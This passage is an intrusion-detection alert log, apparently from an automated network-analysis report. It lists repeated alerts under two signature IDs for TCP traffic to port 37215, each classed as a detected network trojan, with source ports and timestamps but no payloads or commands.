          SID:2829579
          Source Port:40718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858999
          SID:2829579
          Source Port:45332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471393
          SID:2829579
          Source Port:39834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860140
          SID:2835222
          Source Port:39838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.174881
          SID:2835222
          Source Port:58366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707125
          SID:2829579
          Source Port:42892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111283
          SID:2835222
          Source Port:46000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352811
          SID:2835222
          Source Port:44908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355114
          SID:2835222
          Source Port:58472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792246
          SID:2835222
          Source Port:53618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855233
          SID:2829579
          Source Port:56550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733061
          SID:2835222
          Source Port:51340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897022
          SID:2835222
          Source Port:40648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708713
          SID:2835222
          Source Port:47426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550820
          SID:2835222
          Source Port:42124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465259
          SID:2835222
          Source Port:51282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896884
          SID:2829579
          Source Port:34616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176338
          SID:2835222
          Source Port:47416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742542
          SID:2835222
          Source Port:60412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153392
          SID:2835222
          Source Port:47232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059515
          SID:2829579
          Source Port:59422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739778
          SID:2835222
          Source Port:52588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403915
          SID:2829579
          Source Port:41666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896976
          SID:2829579
          Source Port:53654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.160402
          SID:2829579
          Source Port:38706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402603
          SID:2829579
          Source Port:58794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463342
          SID:2829579
          Source Port:54678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.843513
          SID:2835222
          Source Port:42614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894704
          SID:2835222
          Source Port:51620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264532
          SID:2835222
          Source Port:48998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892353
          SID:2835222
          Source Port:42876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731177
          SID:2835222
          Source Port:48138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356766
          SID:2835222
          Source Port:38376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355957
          SID:2835222
          Source Port:57888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670009
          SID:2835222
          Source Port:57020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853253
          SID:2829579
          Source Port:58490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354752
          SID:2829579
          Source Port:53660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600118
          SID:2835222
          Source Port:53040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354495
          SID:2835222
          Source Port:49060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709337
          SID:2835222
          Source Port:44340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271500
          SID:2835222
          Source Port:40298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601163
          SID:2835222
          Source Port:60106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747356
          SID:2835222
          Source Port:42220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108629
          SID:2829579
          Source Port:44948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112615
          SID:2829579
          Source Port:43802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542320
          SID:2829579
          Source Port:53038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517649
          SID:2835222
          Source Port:55342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274870
          SID:2829579
          Source Port:58560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302588
          SID:2835222
          Source Port:51338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352798
          SID:2829579
          Source Port:33632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799676
          SID:2835222
          Source Port:34466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160043
          SID:2835222
          Source Port:39338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018605
          SID:2835222
          Source Port:37822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131091
          SID:2829579
          Source Port:42896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274120
          SID:2835222
          Source Port:40524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259110
          SID:2829579
          Source Port:49646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894543
          SID:2829579
          Source Port:35816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.817550
          SID:2829579
          Source Port:34622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175910
          SID:2829579
          Source Port:39214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545888
          SID:2829579
          Source Port:53378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512672
          SID:2835222
          Source Port:51726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.145315
          SID:2829579
          Source Port:40596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729327
          SID:2835222
          Source Port:49244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509666
          SID:2835222
          Source Port:48124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276288
          SID:2829579
          Source Port:51982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.517113
          SID:2829579
          Source Port:58804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241323
          SID:2829579
          Source Port:55648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463170
          SID:2829579
          Source Port:57346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465734
          SID:2829579
          Source Port:50052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.734028
          SID:2835222
          Source Port:59614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912668
          SID:2829579
          Source Port:37660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041961
          SID:2835222
          Source Port:52512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355693
          SID:2829579
          Source Port:39820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893650
          SID:2829579
          Source Port:52468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.159281
          SID:2835222
          Source Port:36028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.277026
          SID:2835222
          Source Port:40666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306518
          SID:2835222
          Source Port:45258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155243
          SID:2829579
          Source Port:42284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174518
          SID:2829579
          Source Port:42294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099265
          SID:2835222
          Source Port:52106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602137
          SID:2829579
          Source Port:33722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780695
          SID:2835222
          Source Port:33982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745824
          SID:2835222
          Source Port:49932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789949
          SID:2835222
          Source Port:35908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781919
          SID:2835222
          Source Port:32936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.847134
          SID:2835222
          Source Port:40190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111863
          SID:2835222
          Source Port:44354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740261
          SID:2829579
          Source Port:45618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087868
          SID:2829579
          Source Port:37680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600798
          SID:2835222
          Source Port:47176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175323
          SID:2835222
          Source Port:37456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.598511
          SID:2829579
          Source Port:34918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806933
          SID:2835222
          Source Port:33272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897472
          SID:2829579
          Source Port:35842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175604
          SID:2835222
          Source Port:49130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465531
          SID:2835222
          Source Port:54326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040154
          SID:2829579
          Source Port:49486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184240
          SID:2829579
          Source Port:44386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888216
          SID:2829579
          Source Port:53530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846109
          SID:2835222
          Source Port:52032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356981
          SID:2829579
          Source Port:36002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554760
          SID:2829579
          Source Port:49282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513656
          SID:2835222
          Source Port:38926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180546
          SID:2835222
          Source Port:40702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460805
          SID:2829579
          Source Port:41434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270031
          SID:2829579
          Source Port:39878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174764
          SID:2829579
          Source Port:51030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792823
          SID:2829579
          Source Port:53402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019836
          SID:2829579
          Source Port:43798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.172872
          SID:2829579
          Source Port:51380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671769
          SID:2829579
          Source Port:41534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669720
          SID:2835222
          Source Port:45252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020459
          SID:2835222
          Source Port:46582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.822599
          SID:2835222
          Source Port:57588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036363
          SID:2829579
          Source Port:36348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403879
          SID:2829579
          Source Port:53898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.843152
          SID:2829579
          Source Port:49724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041937
          SID:2835222
          Source Port:57454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.862645
          SID:2835222
          Source Port:46144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113659
          SID:2835222
          Source Port:53492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242614
          SID:2835222
          Source Port:41106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406028
          SID:2835222
          Source Port:38014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.401551
          SID:2835222
          Source Port:56166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855256
          SID:2835222
          Source Port:55368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791507
          SID:2835222
          Source Port:46950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783863
          SID:2835222
          Source Port:49656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782743
          SID:2835222
          Source Port:38004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732119
          SID:2835222
          Source Port:44220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708254
          SID:2829579
          Source Port:51708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240569
          SID:2835222
          Source Port:47072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160512
          SID:2829579
          Source Port:46140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.187985
          SID:2835222
          Source Port:54298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449729
          SID:2835222
          Source Port:52032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462062
          SID:2829579
          Source Port:58152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513656
          SID:2835222
          Source Port:58586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.832271
          SID:2829579
          Source Port:46412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514263
          SID:2835222
          Source Port:59460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268926
          SID:2835222
          Source Port:39810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352790
          SID:2835222
          Source Port:46112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176381
          SID:2829579
          Source Port:57162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017597
          SID:2829579
          Source Port:32974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601881
          SID:2835222
          Source Port:33566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356503
          SID:2835222
          Source Port:48432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887708
          SID:2835222
          Source Port:45132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816741
          SID:2835222
          Source Port:35924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549485
          SID:2829579
          Source Port:56276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808790
          SID:2835222
          Source Port:59112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733053
          SID:2829579
          Source Port:41306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113346
          SID:2835222
          Source Port:45496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159979
          SID:2829579
          Source Port:50094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551852
          SID:2835222
          Source Port:51672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.296270
          SID:2829579
          Source Port:60628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037352
          SID:2835222
          Source Port:34440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670583
          SID:2835222
          Source Port:47096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259948
          SID:2829579
          Source Port:42162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743625
          SID:2829579
          Source Port:35728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705528
          SID:2835222
          Source Port:38306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350660
          SID:2835222
          Source Port:39704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.822774
          SID:2835222
          Source Port:49414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272638
          SID:2835222
          Source Port:55470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731366
          SID:2829579
          Source Port:50280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599814
          SID:2829579
          Source Port:46342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059794
          SID:2835222
          Source Port:44614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.859478
          SID:2829579
          Source Port:59736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107980
          SID:2835222
          Source Port:45678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547929
          SID:2835222
          Source Port:49890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395162
          SID:2835222
          Source Port:41166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350862
          SID:2829579
          Source Port:60810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179846
          SID:2829579
          Source Port:32814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266030
          SID:2829579
          Source Port:49052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709012
          SID:2835222
          Source Port:53860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901484
          SID:2835222
          Source Port:57002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817175
          SID:2829579
          Source Port:36892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406255
          SID:2835222
          Source Port:34612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112690
          SID:2835222
          Source Port:50796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353466
          SID:2835222
          Source Port:60216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466020
          SID:2835222
          Source Port:42372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239111
          SID:2835222
          Source Port:48580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152237
          SID:2835222
          Source Port:36196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.859444
          SID:2835222
          Source Port:54590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099280
          SID:2829579
          Source Port:35674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059495
          SID:2829579
          Source Port:45850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.860805
          SID:2835222
          Source Port:51292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099391
          SID:2829579
          Source Port:60986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.806694
          SID:2829579
          Source Port:45978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272804
          SID:2835222
          Source Port:37968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.189177
          SID:2835222
          Source Port:54462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175627
          SID:2829579
          Source Port:33508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276350
          SID:2829579
          Source Port:48378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446686
          SID:2829579
          Source Port:55992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.154834
          SID:2829579
          Source Port:35798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019527
          SID:2829579
          Source Port:56272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271617
          SID:2829579
          Source Port:60014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.361770
          SID:2829579
          Source Port:46866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603290
          SID:2829579
          Source Port:46412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262488
          SID:2829579
          Source Port:42766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732572
          SID:2835222
          Source Port:48116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.134250
          SID:2829579
          Source Port:46196
          Destination Port:37215
